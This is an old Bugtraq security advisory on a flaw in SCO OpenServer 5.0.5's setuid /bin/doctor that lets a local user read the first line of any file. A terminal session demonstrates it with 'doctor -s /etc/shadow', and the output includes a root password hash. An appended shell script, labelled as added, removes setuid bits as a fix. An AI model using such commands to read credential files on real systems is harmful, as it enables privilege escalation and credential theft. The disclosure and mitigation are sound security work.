






SCO OpenServer 5.0.5 /bin/doctor root compromise









=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Date: Tue, 07 Sep 1999  19:44:42
   From: Brock Tellier <btellier@WEBLEY.COM>
     To: BUGTRAQ@SECURITYFOCUS.COM
Subject: SCO OpenServer 5.0.5 /bin/doctor root compromise
--------------------------------------------------------------------------------


Greetings,


INFO:
There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.  By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow).  Example:

scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX:
Just chmod -s until SCO comes out with a fix.  Although I certainly won't be changing it back to suid root anytime soon.  If a hole like this exists, there are undoubtedly countless more lurking within.  

Brock Tellier
Systems Administrator
Webley Systems
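
The "chmod -s" workaround from the FIX section as a repeatable step, given here as an added example that is not part of the original post: it lists setuid files under a directory, strips the setuid/setgid bits from one binary, records the previous permissions so they can be reviewed once a vendor fix exists, and verifies the result. The function names and the log path are assumptions made for this sketch.

```shell
#!/bin/sh
# Added example: helper names and log file location are constructed,
# not taken from the advisory. Uses only POSIX find/test/chmod/ls.

# list_setuid DIR
# Print every regular file under DIR that has the setuid bit set.
list_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null
}

# strip_setuid FILE [LOG]
# Remove the setuid and setgid bits from FILE.
# The original "ls -ld" line is appended to LOG first, so the old mode
# and owner are on record when the vendor patch is evaluated.
# Return codes: 0 stripped, 1 nothing to strip, 2 bad argument,
#               3 log or chmod failed, 4 bit still set afterwards.
strip_setuid() {
    file=$1
    log=${2:-./setuid-stripped.log}

    if [ ! -f "$file" ]; then
        echo "strip_setuid: $file: not a regular file" >&2
        return 2
    fi
    if [ ! -u "$file" ] && [ ! -g "$file" ]; then
        echo "strip_setuid: $file: no setuid/setgid bit set" >&2
        return 1
    fi

    # Record the pre-change state before touching the file.
    ls -ld "$file" >> "$log" || return 3
    chmod u-s,g-s "$file" || return 3

    # Verify rather than trust the chmod exit status alone.
    if [ -u "$file" ] || [ -g "$file" ]; then
        echo "strip_setuid: $file: bit still set" >&2
        return 4
    fi
    return 0
}

# Typical use on the host from the advisory (run as root):
#   list_setuid /bin
#   strip_setuid /bin/doctor /var/adm/setuid-stripped.log
```

Re-running list_setuid after an OS upgrade or patch install shows whether the package restored the bit.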



